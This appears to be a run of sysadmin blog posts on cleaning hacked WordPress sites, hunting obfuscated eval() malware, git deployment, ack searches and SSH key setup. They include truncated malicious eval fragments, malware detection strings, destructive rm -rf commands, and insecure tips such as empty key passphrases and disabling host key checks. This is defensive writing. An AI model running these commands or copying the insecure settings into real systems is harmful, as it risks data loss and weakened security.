I’m a huge fan of the scorched earth clean up for WordPress. By which I mean when I clean up WP, I rip it out, scrub it, and reinstall. This scares the heck out of people sometimes, and if you’re doing it in a GUI, yeah, it can be sucky and time consuming. Me? I do it in 5-10 minutes, depending on if my cat wants to be petted.
I’ve been asked ‘How do you do it that fast?’ so here are my steps for cleaning up WP, with the following assumptions:
I’m working in the folder where WP is installed
wp-config.php is in this folder
WP is in ‘root’ (i.e. I’m not giving WP it’s own folder)
If any of those aren’t true for you, adjust the folder locations in the commands:
Pause. Here I’m using WP CLI, which makes my life way easier. If you’re not, you’ll need something like this: mysqldump --opt --user=username --password=password --host=yourMySQLHostname dbname > domain_com.sql
Zip up the files I want to backup: zip -r ../domain.zip *.sql wp-config.php .htaccess wp-content/
Set glob. Glob is scary, I know, but read about glob before you dismiss it (if you’re on korn, you can usually skip this): shopt -s extglob
Delete files: rm -rf !(wp-config.php|wp-content)
Pause. At this point, It’s probably wise to consider that my hack may be in my theme and/or plugin. If so, I want to nuke them and JUST keep my uploaded files, so I use this instead…
Pause again. No matter what, want to scan for evil files, but this way I do it over a much smaller group of files. Either way, though, I do want to scan the folder for evil, because leaving behind hacks in themes and plugins is really common. Also it’s a good idea to delete every plugin you don’t use, and theme as well. Since you really can’t delete all themes but one on a Multisite, this gets harder. Generally I don’t delete the themes automatically, but instead go in and nuke them one at a time, so I run this…
Now we can move on, knowing our personal files are clean.
Copy it back: cp -r ../wordpress/* .
Clean it up: rm -rf ../wordpress ../latest.zip
And now you’re done! When you want to reinstall plugins and themes, I do via wp-cli because it’s faster: wp plugin install NAME and wp theme install NAME
Then I activate as needed and I’m off to the races. If I deleted my mu-plugins, I copy those back from my backup zip, one at a time, checking each file for hacks.
The best thing about this is you can apply the logic to any CMS out there. Just know what you have to delete and keep. The downside? It doesn’t touch your database. Rarely is this an issue for me, except in the case of the Pharma hack. I’ve not had a DB infected yet.
Do you have a solid methodology for cleaning it up?
Credit: EvalBlogOne of the things I do at DreamHost is help with hacked sites. This means when WP is hacked, I look at it, figure out how, and explain to the person how to fix it, or how to tell their tech folks what needs doing. There are occasions where I’ll delete things for them, but usually that happens when there’s a folder or file with weird permissions.
We have a lot of tricks with what we look for, like base64, but recently I started to find files that missed my scan, but not my “Hey, wait, wp-mai1.php isn’t a WordPress file…” check. Files like this:
Now obviously I can just add str_rot13 to my checklist (nothing in WordPress core uses it), but .. how do I look for those eval strings?
Eval is a funny thing. In JavaScript: The Good Parts, Douglas Crockford states “eval is Evil: The eval function is the most misused feature of JavaScript. Avoid it” but he’s taking JS and I’m looking at php files. So with the (current) assumption that I can ignore js I can try this(I also use ack for this half the time, depends on my mood)(You can leave out ‘exclude SVN’ stuff if you want to. Most users don’t have it.):
That gets me a lot of files, though, and I don’t want to parse what I don’t need to. By the way, there’s one and only one file in all of WP that uses eval() in a ‘nefarious’ way, and that’s ./wp-admin/js/revisions-js.php, which is the WordPress easter egg. That’s also the only place you’ll see p,a,c,k,e,r code. But clearly I want to look for eval( or even eval($ because that’s more exact, and that should give me a better result.
This is a two edged sword, of course. If I’m too precise, I will miss some of their shenanigans. If I’m not close enough to what I’m looking for, I get too much. And worst of all, I don’t always know what I’m looking for. Quite a lot of finding new hacks is a world where “I’ll know it when I see it.” So let’s take it down and say I want to find no JS, nothing in .svn, and anything with eval and a paren:
Now I’m telling it to cut up after 80 characters, because it’s easier to pick out the bad with just that much. Look:
./foo.php:eval($a51a0e6bb0e53a($a51a0e6bb0e5e4('eF6dWFtv6kYQ/it9qMQ5UlWBCVGtKg+J
./foo.php:eval($a51a0e6bb0e53a($a51a0e6bb0e5e4('eF7tW1uvotqW/ivnYSe1d85JignSvcxJ
./wp-admin/includes/class-pclzip.php:// eval('$v_result = '.$p_options[PCLZ
./wp-admin/js/revisions-js.php:eval(function(p,a,c,k,e,r){e=function(c){return(c
./wp-admin/press-this.php: var my_src = eval(
./wp-admin/press-this.php: var my_src = eval(
./wp-admin/press-this.php: eval(data);
./wp-includes/class-json.php: * Javascript, and can be directly eval()'ed with n
./wp-includes/functions.php: if ( doubleval($bytes) >= $mag )
Part of the reason this works is I know what I’m looking for. WordPress, in general, doesn’t encrypt content. Passwords and security stuff, yes, but when it does that, it uses variables so you would get eval('$v_result = '.$p_options[PCLZIP_CB_PRE_EXTRACT].'(PCLZIP_CB_PRE_EXTRACT, $v_local_header);');, which remains totally human readable. By that I mean I can see clear words that are easy to search for in a doc, or via grep or awk without being forced to copy/paste. I can remember “PCLZIP underscore CB…”
Those random characters are not human readable at all. That’s how I know they’re bad. Of course, if someone got clever-er, they would start naming those variables things that ‘make sense’ in the world of WP, and I have a constant fear that by pointing out how I can tell this is a hack, I give them ideas on how to do evil-er things to us.
It’s for reasons like this that I, when faced with a hack or asked to clean one up, always perform Scorched Earth Security. I delete everything and reinstall it. I look for PHP and JS files in wp-content/uploads, or .htaccess files anywhere they shouldn’t be (in clean WP, you have two at most: at the root of your site and in akismet). I make sure I download my themes and plugins from known clean locations. I’m careful. And I always change my passwords. Heck, I don’t even know what mine are right now!
But none of this is static enough for me to say “This is the fix forever and ever” or “this is how you will always find the evil…” By the time we’ve codified and discussed best methods, the hackers have moved on. The logic of what to look for now may not last long, but the basic concept of looking for wrong and how to search for it should remain a good starting point for a while yet.
Do you have special tricks you use to find the evil? Like what Topher did to clean up a hack?
I’ve been banging my head on this for a while. It really did take me a year and reading lots of things to begin to understand that I was totally wrong. As with many things, I have to sit down and use them for a while to understand what I’m doing wrong, and what I need to learn. I finally had my git breakthrough. It’s very possible (no, likely) that I got some of this wrong, but I feel like I now understand more about git and how it should be used, and that made me more confident in what I’m doing with it.
Speaking as a non-developer (hey, sometimes I am!), I just want a command line upgrade for my stuff. This code also lacks a WordPress-esque click to upgrade, so I have to do a three step tango to download, unpack, copy, delete, in order to upgrade.(By the way, more software should have one-click upgrades like that, it would make life easier for everyone. I do know that the backend support is non-trivial, so I would love to see a third-party act as a deployment hub, much like GitHub is a repository hub.) The more steps I have, the more apt I am to make an error. So in the interests of reducing my errors and my overhead, I wanted to find a faster and safer way to deploy.(My previous job was all about deployment. We had a lot of complicated scripts to take our code, compile it, compress it, move it to a staging site, and then email that it was ready. From there, we had more scripts to ‘move to test’ and ‘move to prod’ which made sense.)
Since I already thing that automating and simplifying deployment is good, and all I want to do is get one version, the ‘good’ version, of code and be able to easily update it. One or two lines is best. Simple, reliable, and easy to use. That’s what I want.
Recently, Ryan Hellyer pointed out git archive, which he claims is faster than clone. I’d believe it if I could get it to work. When I tried using HTTPS, I got this: fatal: Operation not supported by protocol.. So I tried using ssh and got Could not resolve hostname… instead. Basically I had all these problems. Turns out github turned off ‘git archive -remote’ so I’m dead in the water there for any code hosted there, which is most of my code.
I kicked various permutations of this around for a couple afternoons before finally throwing my hands up, yet again, and looking into something else, including Capistrano, which Mark Jaquith uses in WP Stack. It’s something I’m personally interested in for work related reasons. Capistrano is a Ruby app, and vulnerability fears aside, it’s not very user friendly. At my old job, we used ant a lot to deploy, though there don’t seem to be ant tasks yet for Git. The problem with both of those is that they require you to pull down the whole hunk ‘o code and I’m trying to avoid that in this use case. Keep it simple, stupid. Adding more layers of code and complication onto a project that doesn’t need it is bad.
Finally I went back to git and re-read how the whole distributed deployment works. I know how to clone a repository, which essentially gets me ‘trunk.’ And I know that a pull does a fetch followed by a merge, in case I’d done any edits, and it saves my edits. Hence merge, and why I dig it for dev. At length it occurred to me that what I wanted was to check out the git repo without downloading the code at first. Well I know how to do that:
That brings down just a .git folder, which is small. And from there, I know how to get a list of tags:
$ git tag -l
v0.3.0
[...]
v0.8.0
v0.9.0
And now I can check out version 8!
$ git checkout v0.8.0
Note: checking out 'v0.8.0'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:
git checkout -b new_branch_name
HEAD is now at 8acc57d... set version to 0.8.0
Well damn it, that was simple. But I don’t want to be in a detached head state, as that means it’s a little weird to update. I mean, I could do it with a switch back to master, a pull, and a checkout again, but then I thought about local branches. Even though I’m never making changes to core code (ever), let’s be smart. Linus Torvalds flipping Nvidia the birdOne codebase I use has the master branch as their current version, which is cool. Then there’s a 1.4.5 branch where they’re working on everything new, so when a new version comes out, I can git pull and be done.(In this moment, I kind of started to get how you should be using git. In SVN, trunk is where you develop and you check into tags (for WordPress at least) to push finished versions. In git, you make your own branch, develop there, and merge back into master when you’re ready to release. Commence head desking.)
One conundrum was that there are tags and branches, and people use them as they see fit. While some of the code I use defines branches so I can check out a branch, others just use tags, which are treeish. Thankfully, you can make your own branch off a tag, which is what I did.
I tried it again with a non-Github slice of code: Mediawiki.(Mediawiki, compared to wp-cli, is huge, and took a while to run on my laptop. It was a lot faster on my server. 419,236 objects vs 10464. I’m just saying someone needs to rethink the whole ‘Clone is faster!’ argument, since it’s slow now, or slow later, when downloading large files. Large files is large.) Now we have a new issue. MediaWiki’s .git folder is 228.96 MiB… Interestingly, my MediaWiki install is about 155MiB in and of itself, and diskspace is cheap. If it’s not, you’ve got the wrong host. Still, it’s a drawback and I’m not really fond of it. Running repack makes it a little smaller. Running garbage collection made it way smaller, but it’s not recommended. This, however, is recommended:
git repack -a -d --depth=1 --window=1
It doesn’t make it super small, but hey, it worked.
Speaking of worked, since the whole process worked twice, I decided to move one of my installs (after making a backup!) over to this new workflow. This was a little odd, but for Mediawiki it went like this:
git clone --no-hardlinks --no-checkout https://gerrit.wikimedia.org/r/p/mediawiki/core.git wiki2
mv wiki2/.git wiki/
rmdir wiki2
cd wiki
git reset --hard HEAD
Now we’re cloning the repo, moving our files, resetting where HEAD is, and I’m ready to set up my install to use the latest tag, and this time I’m going to make a branch (mysite-1.20.3) based on the tag (1.20.3):
git checkout -b mysite-1.20.3 1.20.3
And this works great.
The drawback to pulling a specific tag is that when I want to update to a new tag (1.20.4 let’s say), I have to update everything and then checkout the new tag in order to pull down the files. Now, unlike svn, I’m not making a full copy of my base code with every branch or tag, it’s all handled by head files, so there’s no harm keeping these older versions. If I want to delete them, it’s a simple git branch -D mysite-1.20.3 call and I’m done. No code changes (save themes and .htaccess), no merging needed. And if there’s a problem, I can switch back really fast to the old version with git checkout mysite-1.20.3. The annoyance is that I just want to stay on the 1.20 branch, don’t I? Update the minors as they come, just like the WP minor-release updater only updates changed files.
Thus, I asked myself if there was a better way and, in the case of MediaWiki, there is! In world of doing_it_right(), MediaWiki has branches and tags(So does WP if you looked at trac.), and they use branches called ‘REL’. If you’re not sure what branches your repo uses, type git remote show origin and it will list everything. There I see REL1_20 and since I’m using version 1.20.3 here, I surmised that I can actually do this instead:
git checkout -b mysite-REL1_20 origin/REL1_20
This checks out my branch and says “This branch follows along with REL1_20.” so when I want to update my branch it’s two commands:
git fetch --all
git pull
The fetch downloads the changesets and the pull applies it. It looks like this in the real world (where I’m using REL1_21 since I wanted to test some functionality on the alpha version):
This doesn’t work on all the repos, as not everyone follows the same code practices. Like one repo I use only uses tags. Still, it’s enough to get me fumbling through to success in a way that doesn’t terrify me, since it’s easy to flip back and forth between versions.
Fine. I’m sold. git’s becoming a badass. The only thing left is to protect myself with .htaccess:
And to figure out how to get unrelated instances of git in subfolders to all update(Mediawiki lets you install extensions via git, but then you don’t have a fast/easy way to update…):
#!/bin/sh
for i in `find ./ -maxdepth 1 -mindepth 1 -type d`; do
cd $i
git pull
cd ../
done
And I call that via ./git.sh which lives in /wiki/extensions and works great.
From here out, if I wanted to script things, it’s pretty trivial, since it’s a series of simple if/else checks, and I’m off to the races. I still wish every app had a WordPress-esque updater (and plugin installer, hello!) but I feel confident now that I can use git to get to where my own updates are faster.
I do a lot of things by command line. Still. It’s faster, it’s easier, and in many cases, gives me more control. And as I always mention, people who use command line are people who really lazy. We don’t like sixteen clicks. If we can copy/paste and change one thing, we’re happy.
For ages, when I wanted to search my local repository of plugins, I’d whip out something like this:
This works, but it’s slow and it’s not very pretty. The file output is a mess and it’s painstaking to sort through and understand.
/home/me/Development/WP-Plugin-Dir/jetpack/class.jetpack-post-images.php: ob_start(); // The slideshow shortcode handler calls wp_print_scripts and wp_print_styles... not too happy about that
/home/me/Development/WP-Plugin-Dir/jetpack/modules/comments/comments.php: ob_start();
/home/me/Development/WP-Plugin-Dir/jetpack/modules/contact-form/grunion-contact-form.php: ob_start();
/home/me/Development/WP-Plugin-Dir/jetpack/modules/custom-css/custom-css.php: ob_start('safecss_buffer');
/home/me/Development/WP-Plugin-Dir/jetpack/jetpack.php: ob_start();
/home/me/Development/WP-Plugin-Dir/jetpack/jetpack.php: ob_start();
/home/me/Development/WP-Plugin-Dir/jetpack/class.jetpack-post-images.php:36: ob_start(); // The slideshow shortcode handler calls wp_print_scripts and wp_print_styles... not too happy about that
/home/me/Development/WP-Plugin-Dir/jetpack/modules/comments/comments.php:138: ob_start();
/home/me/Development/WP-Plugin-Dir/jetpack/modules/contact-form/grunion-contact-form.php:264: ob_start();
/home/me/Development/WP-Plugin-Dir/jetpack/modules/custom-css/custom-css.php:350: ob_start('safecss_buffer');
/home/me/Development/WP-Plugin-Dir/jetpack/jetpack.php:872: ob_start();
/home/me/Development/WP-Plugin-Dir/jetpack/jetpack.php:928: ob_start();
That’s ack, which claims to be better than grep, and I’m kind of agreeing. Let’s look at the small differences.
Line numbers. That will help me find the code later.
You can see that ack is a lot more powerful right away when it comes to being able to quickly use the data without a lot of parsing. There are some catches with ack, though, like it has a whitelist of file types that it will search, so if you don’t tell it to search .html, it won’t. That’s a small price to pay for me.
The documentation is written in nerd, so I generally find looking at concrete examples is more helpful. Do you have tricks with ack (or even grep) that save you time and money?
Warning! I’m going to talk about the ‘rm’ command which is a super-deadly command in the linux world. No matter what, never ever ever consider running it unless you’re certain you know what it does!
I review a lot of plugins, which means I download them all to my laptop, review all the code, possibly install them, and then delete. This means, on any given week, I have 5000 items in my trash. And this is without unzipping! (Yes, we get a lot of plugins, and TextWrangler lets me review most of them in their zips.)
When I forget to empty my trash every day, I end up waiting hours for the GUI empty to run unless I use rm -rf from inside the ~/.Trash/ folder. The real command is this:
$ rm -rf ~/.Trash/*
I like this because it’s crazy fast compared to the GUI, and
But sometimes I actually just want to commandline my trash. I’ll be banging on things in Terminal and a very simple ’empty trash’ command would be nice, right? OSX Trash lets me type trash -l to see what’s in my trash, and trash -e to run the normal empty command. It’s better than a lot of other scripts, because if I type trash filename and there’s already a file with that name in the trash, it behaves like Mac Norm. That is, it’ll rename my second file ‘filename date’ and I won’t have file conflicts!
The only thing it’s missing is a ‘trash -p’ command, which would let me run the force rm and just dump it all. Yes, I know rm works, but if you’ve ever typed it in the wrong window, you know why it’s a terrifying command. Still, back to the age old rm commands, what happens when you have that annoying locked file error? Like me, you probably kvetch about quitting everything to delete.
More command line magic!
$ cd ~/.Trash
$ chflags -R nouchg *
$ rm -rf *
Finally, to make this full circle, I made a dead simple alias to prevent me from fat fingering the rm too much:
alias trashdump='rm -rf ~/.Trash/*'
Fast, efficient, and potentially deadly, but less than manually typing it in all the time. Deleted 2000 files in seconds, versus minutes.
I’m incurably lazy, and as we all know, lazy techs like to automate (ltla?).
I ssh a lot into my personal servers, and I get tired of having to type ssh account@server.com, and then enter my password. So I got smart.
Since I’m on a Mac, the first thing I did was grab iTerm2. This lets me create simple profiles so with a click, I can log in to any of my servers. When I was using Windows, I used PuTTY and the add-on for Connection Manager.(The real PuTTY CM site is gone, and binarysludge just keeps a copy on hand for the same reasons I do. You never know when you need it. Mine’s in my Dropbox storage.)
What I really loved about PuTTY CM was that I could fill the pref file with my accounts and passwords, and then one-click connect to any of my servers. This was as The Bank Job, where I had a couple hundred servers to do this with, and when I had to change my password, I could search/replace that file. I know, it’s not secure. At DreamHost, I had the same, but they scripted it so I can sudo in with a handy call that I’m in love with. As long as I remember my password, I’m fine. But see, I told you, I’m horribly lazy and I hate having to log in with my password, then sudo again with my password.
The first step for this is to make an rsa key pair. This is a fancy way of telling both computers to trust each other, so on your personal computer (we’re assuming linux here), go to your home folder and type this:
[Laptop] $ ssh-keygen -t rsa
You’ll be presented with a series of informative notes and questions. Accept all the defaults, and keep your passphrase empty.
Generating public/private rsa key pair.
Enter file in which to save the key (/home/ipstenu/.ssh/id_rsa):
Created directory '/home/ipstenu/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/ipstenu/.ssh/id_rsa.
Your public key has been saved in /home/ipstenu/.ssh/id_rsa.pub.
The key fingerprint is:
3e:4f:05:79:3a:9f:96:7c:3b:ad:e9:58:37:bc:37:e4 ipstenu@[Laptop]
This saves your public ‘key’ in the .ssh folder (yes, it’s a folder)
Now we have to setup the server (halfelf.org for example):
This will SSH into halfelf as ‘myaccount’ and create a folder called .ssh. You only need to do this once, so after you set up the key for one computer, you can skip this the next time.
Finally we’re going to append the public key from my laptop over to HalfElf, so it trusts me:
The reason we’re appending is so that if I decide I want to add my Work Laptop, I can just make the key, and then repeat that last command and it will add it to the bottom, trusting both.
There’s a caveat here, which caught me last week. I set everything up for my new server, ElfTest, and then moved the server to a VPS. The IP changed, so the trusted key was invalid. You see, every time you connect to a server for the first time, it asks you to trust it. If anything in that fingerprint changes, you have to re-trust. This is annoying:
The authenticity of host 'elftest.net (111.222.333.444)' can't be established.
RSA key fingerprint is f3:cf:58:ae:71:0b:c8:04:6f:34:a3:b2:e4:1e:0c:8b.
Are you sure you want to continue connecting (yes/no)?
After you respond “yes” the host gets stored in ~/.ssh/known_hosts and you won’t get prompted the next time you connect. When it became invalid, I had to go edit that file and delete the entry for elftest (it’s partly human readable, so it wasn’t too bad).
If you hate this as much as I do, and you feel you’re immune to man-in-the-middle attacks, there’s a nifty command:
ssh -o "StrictHostKeyChecking no" user@host
This turns off the key check. Generally speaking? Don’t do this. I’ve actually only done it once. (This was at the bank, where I was behind so many firewalls, if you’d gotten to my computer, I was in trouble anyway.)
We use cookies to personalize content and ads, to provide social media features, and to analyze our traffic. We also share information about your use of our site with our social media, advertising, and analytics partners.